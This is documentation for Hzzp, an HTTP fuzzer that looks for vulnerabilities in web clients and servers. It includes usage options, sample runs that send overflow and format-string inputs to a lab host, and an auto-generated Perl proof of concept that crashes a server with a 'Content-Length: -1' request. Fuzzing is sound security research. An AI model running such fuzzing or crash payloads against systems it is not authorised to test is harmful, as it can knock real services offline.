hzzp_doc.txt 04.27.2009 Krakow Labs Development [www.krakowlabs.com] Hzzp Documentation rush@KL (Jeremy Brown) [rush@krakowlabs.com] -------------------------------------------------------------------------------------------------------------------------------- WHAT IS IT? Hzzp is a HTTP compliant client and server fuzzer. Hzzp's main features include HTTP response and request fuzzing, authentication fuzzing, query parameter fuzzing, and automatic or manual exploit generation. Hzzp is pronounced "Huzzup". -------------------------------------------------------------------------------------------------------------------------------- PURPOSE Hzzp's purpose is to find vulnerabilities in HTTP compliant clients and servers. HTTP compliant clients include: Web Browsers HTTP Mirroring Software HTTP Proxy Clients Download Managers HTTP compliant servers include: HTTP Servers HTTP Proxy Servers HTTP User Interfaces HTTP Administration Interfaces Along with various other HTTP-speaking software. -------------------------------------------------------------------------------------------------------------------------------- HOW DOES IT WORK? Hzzp has the HTTP protocol briefly implemented so it knows how client and server procedures work and how to fuzz them. ============== Code Structure ============== Client side fuzzing is fairly automatic by structuring the fuzzing responses with meta refresh data. Server side fuzzing is achieved by connecting to the target, generating the fuzzing request, and sending it to the target. Options are available for logging and automatic exploit generation (or proof of concept in many cases) if Hzzp detects the target has stopped taking connections. Hzzp will continue to fuzz until it has surpassed available target input (fairly unique to the fuzzing mode) and all fuzzing data has been exhausted. Hzzp also includes a manual exploit generation mode and a banner retrieval function, along with many other options. ============== User Interface ============== USAGE: ./hzzp <-C/-S/-E/-B> SELECTIONS OPTIONAL: -T [Target] -P [Port] [-L Log.file] [-A exploit.pl] [-V] [-D] -C Client Side Fuzzing 1 (Protocol) 2 (Protocol Version) 3 (Status Code) 4 (Status Phrase) 5 (Response Headers) 6 (Response Header Fields) [-s status code] 7 (Basic Authentication) 8 (Digest Authentication) [-p /path] -S Server Side Fuzzing 1 (Method) 2 (Request) 3 (Request Port) 4 (Protocol) 5 (Protocol Version) 6 (Request Headers) 7 (Request Header Fields) [-m method] 8 (Basic Authentication) 9 (Digest Authentication) [-p /path] 10 (Query Parameters) -p [/path] -b [beginning query data] -x [parameter to fuzz] -e [ending query data] -E Exploit Generation -B (Fetch Banner) -T PREFERENCES: -c [Custom Fuzzing Data] -h [Custom Header] -d [Digest #] -y [Oracle #] -z [Header #] INFORMATION: [-F Fuzzing Oracle] [-H Headers] [-J Digest Directives] [-M Methods] [-O Status Codes] =================== Programming Outline =================== hzzp.c - Main UI hzzp_usage() - Information Display hzzp_counter() - Counter hzzp_fetch_banner() - Fetch Banner fuzz.c - Fuzzing Module hzzp_headline() - Headline Generation hzzp_engine() - Central Fuzzing Control hzzp_client() - HTTP Client Fuzzing hzzp_server() - HTTP Server Fuzzing hzzp_resp() - HTTP Response Configuration hzzp_resp_fuzz() - HTTP Response Control Data hzzp_resp_lines() - HTTP Response Line Preparation and Delivery hzzp_resp_hdrs() - HTTP Response Header Preparation and Delivery hzzp_resp_httpauth() - HTTP Response Authentication Preparation and Delivery hzzp_req() - HTTP Request Configuration hzzp_req_fuzz() - HTTP Request Control Data hzzp_req_lines() - HTTP Request Line Preparation and Delivery hzzp_req_hdrs() - HTTP Request Header Preparation and Delivery hzzp_req_httpauth() - HTTP Request Authentication Preparation and Delivery hzzp_req_query() - HTTP Request Query Preparation and Delivery hzzp_log() - Logging hzzp_exgen() - Exploit Generation hzzp_list_fzorc() - List Fuzzing Oracle hzzp_list_hdrs() - List HTTP Response and Request Headers hzzp_list_digdirs() - List HTTP Digest Authentication Directives hzzp_list_methods() - List HTTP Methods hzzp_list_scodes() - List HTTP Status Codes hzzp_fzof_gen() - Fuzzing Oracle's Overflow Data Generation core.h - Core Header fuzz.h - Fuzzing Oracle http.h - HTTP Definitions -------------------------------------------------------------------------------------------------------------------------------- HOW DO I USE IT? 1) Make Hzzp (or use the binary that comes with the package). rush@linux:~/hzzp$ make gcc hzzp.c fuzz.c -o hzzp rush@linux:~/hzzp$ 2) Define how you want to use Hzzp. Note: FUZZ = Fuzzing Data * Fuzz HTTP Clients (Protocol -> FUZZ/1.1 200 OK) -> ./hzzp -C 1 [-r xx] * Fuzz HTTP Clients (Protocol Version -> HTTP/FUZZ 401 Not Found) -> ./hzzp -C 2 [-r 20] * Fuzz HTTP Clients (Status Code -> HTTP/1.1 FUZZ OK) -> ./hzzp -C 3 [-r xx] * Fuzz HTTP Clients (Status Phrase -> HTTP/1.1 200 FUZZ) -> ./hzzp -C 4 [-r xx] * Fuzz HTTP Clients (Response Headers -> FUZZ: Hzzp) -> ./hzzp -C 5 [-r xx] * Fuzz HTTP Clients (Response Header Fields -> Server: FUZZ) -> ./hzzp -C 6 [-r xx] * Fuzz HTTP Clients (Basic Authentication -> WWW-Authenticate: Basic realm="FUZZ") -> ./hzzp -C 7 [-r xx] -p /admin * Fuzz HTTP Clients (Digest Authentication -> WWW-Authenticate: Digest realm="FUZZ") -> ./hzzp -C 8 [-r xx] -p /admin * Fuzz HTTP Servers (Method -> FUZZ / HTTP/1.1) -> ./hzzp -S 1 -T 1.2.3.4 [-m x] * Fuzz HTTP Servers (Request -> GET /FUZZ HTTP/1.1) -> ./hzzp -S 2 -T 1.2.3.4 [-m x] * Fuzz HTTP Servers (Request Port -> CONNECT 1.2.3.4:FUZZ HTTP/1.1) -> ./hzzp -S 3 -T 1.2.3.4 [-m 8] * Fuzz HTTP Servers (Protocol -> GET / FUZZ/1.1) -> ./hzzp -S 4 -T 1.2.3.4 [-m x] * Fuzz HTTP Servers (Protocol Version -> GET / FUZZ/1.1) -> ./hzzp -S 5 -T 1.2.3.4 [-m x] * Fuzz HTTP Servers (Request Headers -> FUZZ: Hzzp) -> ./hzzp -S 6 -T 1.2.3.4 [-m x] * Fuzz HTTP Servers (Request Header Fields -> Referer: FUZZ) -> ./hzzp -S 7 -T 1.2.3.4 [-m x] * Fuzz HTTP Servers (Basic Authentication -> Authorization: Basic FUZZ) -> ./hzzp -S 8 -T 1.2.3.4 [-m x] -p /admin * Fuzz HTTP Servers (Digest Authentication -> Authorization: Digest username="FUZZ") -> ./hzzp -S 9 -T 1.2.3.4 [-m x] -p /admin * Fuzz HTTP Servers (Query Parameters -> GET /x.cgi?id=123&user=FUZZ&pass=abcd) -> ./hzzp -S 10 -T 1.2.3.4 [-m x] -p /x.cgi -> -b "?id=123&" -x "user=" -e "&pass=abcd" * Exploit Generation -> ./hzzp -E exploit.pl * Fetch Banner -> ./hzzp -B -T 1.2.3.4 * Target -> ./hzzp -T 1.2.3.4 * Port (DEFAULT=80) -> ./hzzp -P 8080 * Logging -> ./hzzp -L hzzp.log * Automatic Exploit Generation -> ./hzzp -A exploit.pl * Verbose Output -> ./hzzp -V * Debug Output -> ./hzzp -D * Status Code (DEFAULT=3=200) -> ./hzzp -s 5 * Path (DEFAULT=/) -> ./hzzp -p /admin * Beginning Query Data (DEFAULT=) -> ./hzzp -b "?id=123&" * Parameter To Fuzz (DEFAULT="ptf=") -> ./hzzp -x "user=" * Ending Query Data (DEFAULT=) -> ./hzzp -b "&pass=abcd" * Exploit Generation Output Filename -> ./hzzp -f exploit.pl * Method (DEFAULT=2=GET) -> ./hzzp -m 8 * Custom Fuzzing Data -> ./hzzp -c `perl -e 'print "ABCD" x 260'` * Custom Header Data -> ./hzzp -h `perl -e 'print "DBCA" x 260'` * Starting Digest Directive # -> ./hzzp -d 2 * Starting Fuzzing Oracle # -> ./hzzp -y 5 * Starting Header # -> ./hzzp -z 5 * List Fuzzing Oracle -> ./hzzp -F * List Headers -> ./hzzp -H * List Digest Directives -> ./hzzp -J * List Methods -> ./hzzp -M * List Status Codes -> ./hzzp -O 3) Run Hzzp! Demonstration #1 (Client Mode) rush@linux:~/hzzp$ sudo ./hzzp -V -C 3 ********** [Fuzzing Status Code] ********** Krakow Labs Development -> Hzzp ********** [Fuzzing Status Code] ********** INFO: Hzzp -> CLIENT MODE INITALIZING... VERBOSE: Creating Socket... SUCCESS VERBOSE: Binding to PORT 80... SUCCESS VERBOSE: Listening on Socket... SUCCESS INFO: Hzzp -> Waiting for Connections... VERBOSE: [1] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 550) VERBOSE: [2] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 1100) VERBOSE: [3] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 2100) VERBOSE: [4] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 4200) VERBOSE: [5] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 8400) VERBOSE: [6] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 16500) VERBOSE: [7] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 33000) VERBOSE: [8] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 65800) VERBOSE: [9] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 131200) VERBOSE: [10] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 262400) VERBOSE: [11] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 525000) VERBOSE: [12] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 1050000) VERBOSE: [13] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %n x 5) VERBOSE: [14] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %p x 5) VERBOSE: [15] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %s x 5) VERBOSE: [16] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %d x 5) VERBOSE: [17] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %x x 5) VERBOSE: [18] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %s%p%x%d) VERBOSE: [19] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %.1024d) ..... rush@linux:~/hzzp$ Demonstration #2 (Server Mode /w automatic exploit generation) rush@linux:~/hzzp$ ./hzzp -V -T 10.10.10.101 -S 7 -L httpserv.log -A httpserv.pl -y 25 -z 12 ********** [Fuzzing Request Header Fields] ********** Krakow Labs Development -> Hzzp ********** [Fuzzing Request Header Fields] ********** INFO: Hzzp -> SERVER MODE INITALIZING... VERBOSE: Creating Socket... SUCCESS VERBOSE: Connecting to 10.10.10.101:80... SUCCESS INFO: Hzzp -> Fuzzing Target... VERBOSE: [1] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %99999999999s) VERBOSE: [2] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %08x) VERBOSE: [3] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %%20n) VERBOSE: [4] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %%20p) VERBOSE: [5] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %%20s) VERBOSE: [6] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %%20d) VERBOSE: [7] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %%20x) VERBOSE: [8] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%) VERBOSE: [9] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Number: 0) VERBOSE: [10] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Number: -0) VERBOSE: [11] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Number: 1) VERBOSE: [12] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Number: -1) hzzp_error: connect(10.10.10.101:80) ALERT: ***** Hzzp might have found a bug! ***** INFO: Hzzp -> Details logged in httpserv.log INFO: Generating Exploit... INFO: Generation Successful! --> httpserv.pl rush@linux:~/hzzp$ rush@linux:~/hzzp$ cat httpserv.log Hzzp might have found a bug! Host: 10.10.10.101 [10.10.10.101] -> Port 80 Mode: Fuzzing Request Header Fields Method: GET Header: "Content-Length" Fuzzing Data: "Number: -1" rush@linux:~/hzzp$ rush@linux:~/hzzp$ cat httpserv.pl #!/usr/bin/perl # Krakow Labs Development [www.krakowlabs.com] # Exploit Generated by Hzzp # httpserv.pl use IO::Socket; $target = "10.10.10.101"; $port = 80; $payload = "GET / HTTP/1.1\r\nContent-Length: -1\r\n\r\n"; $sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port\n"; $sock->send($payload); close($sock); rush@linux:~/hzzp$ -------------------------------------------------------------------------------------------------------------------------------- Associated Files & Information: http://www.krakowlabs.com/dev/fuz/hzzp/hzzp http://www.krakowlabs.com/dev/fuz/hzzp/hzzp.c.txt http://www.krakowlabs.com/dev/fuz/hzzp/fuzz.c.txt http://www.krakowlabs.com/dev/fuz/hzzp/core.h.txt http://www.krakowlabs.com/dev/fuz/hzzp/fuzz.h.txt http://www.krakowlabs.com/dev/fuz/hzzp/http.h.txt http://www.krakowlabs.com/dev/fuz/hzzp/Makefile.txt http://www.krakowlabs.com/dev/fuz/hzzp/hzzp_doc.txt http://www.krakowlabs.com/dev/fuz/hzzp/hzzp.tar.gz http://www.krakowlabs.com/dev/fuz/hzzp/hzzp.jpeg http://www.krakowlabs.com/dev/fuz/hzzp/hzzp.avi hzzp_doc.txt